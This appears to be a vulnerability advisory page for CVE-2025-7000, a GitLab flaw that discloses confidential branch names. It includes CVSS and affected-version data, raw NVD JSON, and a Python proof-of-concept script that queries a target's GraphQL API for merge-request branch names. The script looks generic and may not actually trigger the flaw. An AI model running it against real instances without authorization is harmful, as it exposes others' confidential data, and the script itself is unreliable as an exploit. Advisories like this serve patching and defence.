Security Vulnerability Report
CVE-2025-7000 CVSS 4.3 MEDIUM

CVE-2025-7000

Published: 2025-11-15 08:15:46
Last Modified: 2025-11-20 21:03:41

Description

An issue has been discovered in GitLab CE/EE affecting all versions from 17.6 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2, that, under specific conditions, could have allowed unauthorized users to view confidential branch names by accessing project issues with related merge requests.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE 17.6 <= version < 18.3.6
GitLab CE/EE 18.4 <= version < 18.4.4
GitLab CE/EE 18.5 <= version < 18.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-7000 PoC - GitLab Information Disclosure
# Description: Unauthorized users can view confidential branch names via project issues

GITLAB_URL = "https://gitlab.example.com"
PROJECT_ID = "<target_project_id>"
ISSUE_IID = "<target_issue_iid>"
USERNAME = "<attacker_username>"
TOKEN = "<attacker_token>"


def check_gitlab_version():
    """Fetch and print the target GitLab version"""
    response = requests.get(f"{GITLAB_URL}/api/v4/version")
    if response.status_code == 200:
        version = response.json().get('version', '')
        # The version is only printed; compare it against the affected ranges listed above
        print(f"[*] GitLab Version: {version}")
        return True
    return False


def get_issue_with_mr():
    """Get issue details and extract branch names from related merge requests"""
    headers = {
        'PRIVATE-TOKEN': TOKEN,
        'Content-Type': 'application/json'
    }

    # GraphQL query to fetch issue with related MRs
    graphql_query = {
        "query": f"""
        {{
          project(fullPath: "{PROJECT_ID}") {{
            issue(iid: "{ISSUE_IID}") {{
              title
              description
              mergeRequests {{
                nodes {{
                  title
                  sourceBranch
                  targetBranch
                  webUrl
                }}
              }}
            }}
          }}
        }}
        """
    }

    response = requests.post(
        f"{GITLAB_URL}/api/graphql",
        json=graphql_query,
        headers=headers
    )

    if response.status_code == 200:
        data = response.json()
        if 'data' in data and 'project' in data['data']:
            issue = data['data']['project']['issue']
            if issue and 'mergeRequests' in issue:
                for mr in issue['mergeRequests']['nodes']:
                    print(f"[!] Disclosed Branch Name: {mr['sourceBranch']}")
                    print(f"[*] MR Title: {mr['title']}")
                    print(f"[*] MR URL: {mr['webUrl']}")
                return True

    print("[-] No confidential branch information disclosed or access denied")
    return False


if __name__ == "__main__":
    print("[*] CVE-2025-7000 PoC - GitLab Confidential Branch Name Disclosure")
    print("[*] Target: " + GITLAB_URL)
    if check_gitlab_version():
        print("[*] Attempting to extract confidential branch names...")
        get_issue_with_mr()
    else:
        print("[-] Failed to verify GitLab version")

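References

https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/553129 (Broken Link)
https://hackerone.com/reports/3214025 (Permissions Required)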

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7000", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:46.487", "lastModified": "2025-11-20T21:03:40.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue has been discovered in GitLab CE/EE affecting all versions from 17.6 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2, that, under specific conditions, could have allowed unauthorized users to view confidential branch names by accessing project issues with related merge requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "4398F785-F443-44A2-9191-768F48B10579"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.6.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "1272563C-FE27-48BE-9666-065197613AE2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": "18.4.4", "matchCriteriaId": "36824F52-C9A0-4FB3-91F3-05593E3551E8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", 
"versionEndExcluding": "18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "7E85D20B-EEE1-4CC9-B50A-4040972287D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/553129", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3214025", "source": "[email protected]", "tags": ["Permissions Required"]}]}}